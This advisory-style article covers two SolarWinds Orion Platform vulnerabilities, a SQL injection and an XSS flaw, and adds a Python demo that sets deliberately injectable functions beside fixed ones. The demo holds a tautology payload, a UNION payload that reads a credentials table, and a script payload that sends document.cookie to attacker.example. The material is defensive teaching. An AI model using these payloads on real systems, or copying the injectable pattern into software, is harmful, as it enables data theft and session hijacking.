In the SolarWinds Orion Platform, an IT management and monitoring product, two critical security vulnerabilities have been identified that could allow threat actors to access sensitive data and execute code on a vulnerable system.
- CVE-2022-36961 is a SQL injection vulnerability caused by insufficient sanitization of user-supplied input. A remote attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands against the application database. Successful exploitation allows the attacker to read, modify and delete data in the database and gain full control over the affected application.
- CVE-2022-36965 is likewise caused by insufficient sanitization of user-supplied input and allows a remote attacker to perform cross-site scripting (XSS) attacks: arbitrary HTML and script code is injected into a victim's browser in the context of the vulnerable site. Successful exploitation allows the attacker to access sensitive information, alter the appearance of the affected page, and stage phishing and malware delivery attacks.
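Both findings share one root cause, user input reaching an interpreter (the SQL engine, the browser's HTML parser) without sanitization. The following added example is not SolarWinds code and does not reproduce either CVE; it is a self-contained illustration of the two bug classes, with an in-memory SQLite database and constructed sample rows standing in for the application database, and hypothetical `find_nodes_*` and `render_node_*` functions showing the injectable pattern beside its parameterized or escaped replacement.

```python
import html
import sqlite3

# Constructed sample data for the demo; none of it comes from SolarWinds.
NODES = [
    ("core-sw-01", "10.0.0.1", "alice"),
    ("edge-fw-01", "10.0.0.2", "bob"),
    ("db-01", "10.0.1.10", "alice"),
]
CREDENTIALS = [
    ("snmp-ro", "hash-1"),
    ("svc-backup", "hash-2"),
]


def make_db():
    """In-memory SQLite database standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nodes (name TEXT, ip TEXT, owner TEXT)")
    conn.execute("CREATE TABLE credentials (username TEXT, secret TEXT)")
    conn.executemany("INSERT INTO nodes VALUES (?, ?, ?)", NODES)
    conn.executemany("INSERT INTO credentials VALUES (?, ?)", CREDENTIALS)
    return conn


def find_nodes_vulnerable(conn, owner):
    """Injectable: the user-supplied value is concatenated into the statement."""
    sql = "SELECT name, ip FROM nodes WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def find_nodes_fixed(conn, owner):
    """Hardened: a bound parameter is sent as data and is never parsed as SQL."""
    return conn.execute("SELECT name, ip FROM nodes WHERE owner = ?", (owner,)).fetchall()


# Two classic payloads: a tautology that dumps every row, and a UNION that reads
# a table the query was never meant to touch (the "read sensitive data" impact).
TAUTOLOGY = "' OR '1'='1"
UNION_READ = "x' UNION SELECT username, secret FROM credentials --"


def render_node_vulnerable(node_name):
    """Reflected XSS: the parameter is written into the page unescaped."""
    return "<h1>Node: " + node_name + "</h1>"


def render_node_fixed(node_name):
    """Hardened: HTML-escaped, correct for element content and quoted attributes."""
    return "<h1>Node: " + html.escape(node_name, quote=True) + "</h1>"


# Hypothetical attacker-controlled value reflected into the page.
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", find_nodes_vulnerable(db, TAUTOLOGY))
    print("vulnerable, union    :", find_nodes_vulnerable(db, UNION_READ))
    print("fixed, tautology     :", find_nodes_fixed(db, TAUTOLOGY))
    print("fixed, union         :", find_nodes_fixed(db, UNION_READ))
    print("vulnerable page:", render_node_vulnerable(XSS_PAYLOAD))
    print("fixed page     :", render_node_fixed(XSS_PAYLOAD))
```

The tautology makes the vulnerable query return every node and the UNION payload returns rows from the `credentials` table, while the parameterized version returns nothing for either payload because the whole string is compared as a literal owner name. For the XSS half, `html.escape` is the right fix only for the HTML element and attribute contexts shown here; a value placed inside a script block, a URL, or a CSS rule needs the encoding for that context instead.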
These vulnerabilities affect all versions of the SolarWinds Orion Platform up to and including 2022.2 and are fixed in the SolarWinds Platform 2022.3 release (the product was renamed from Orion Platform to SolarWinds Platform with that release). Administrators should apply the published security update promptly and confirm that the installed version reports 2022.3 or later, so that these vulnerabilities cannot be used against their deployments.